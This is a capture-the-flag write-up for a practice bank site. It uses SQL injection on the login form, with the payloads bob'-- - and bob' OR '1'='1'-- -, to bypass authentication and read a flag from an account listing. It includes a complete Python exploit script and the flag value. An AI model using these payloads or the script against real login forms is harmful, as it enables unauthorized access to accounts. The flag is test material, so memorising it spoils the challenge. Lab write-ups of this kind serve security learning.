
Trustfall Bank – TOKEN3

Token: PCCC{Bob_b0b_606_Na_3153}

Background

The login form is vulnerable to SQL injection. Logging in as bob'-- - and then viewing /accounts lists his account names; one of those names is the token.

From Nothing to Working

  1. Exploit SQLi on /login with bob'-- - to bypass authentication.
  2. Visit /accounts using the session to list Bob’s accounts.
  3. Extract the account name that contains the token string.

Command

python3 token3_bob_accounts.py

#!/usr/bin/env python3
# token3_bob_accounts.py
import re
import requests

TARGET = "http://trustfallbank.us"

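def main():
    s = requests.Session()
    # First attempt: the trailing comment drops the password check from the login query.
    resp = s.post(f"{TARGET}/login", data={"username": "bob'-- -", "password": "x"},
                  allow_redirects=True, timeout=10)
    if "dashboard" not in resp.url:
        # Fallback payload if the first login did not redirect to the dashboard.
        resp = s.post(f"{TARGET}/login", data={"username": "bob' OR '1'='1'-- -", "password": "x"},
                      allow_redirects=True, timeout=10)

    # Reuse the session cookie from the login to list Bob's accounts.
    resp = s.get(f"{TARGET}/accounts", timeout=10)
    print("[*] Accounts page snippet:")
    print(resp.text[:800])

    # Match the token format directly, then any element text containing "PCCC".
    tokens = re.findall(r'PCCC\{[^}]+\}', resp.text)
    names = re.findall(r'>([^<]*PCCC[^<]*)<', resp.text)
    hits = tokens + names
    if hits:
        print(f"[+] Found: {hits[0]}")
    else:
        print("[-] No token found; check response manually.")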

if __name__ == "__main__":
    main()

Expected Output

Page content includes the account name token:

PCCC{Bob_b0b_606_Na_3153}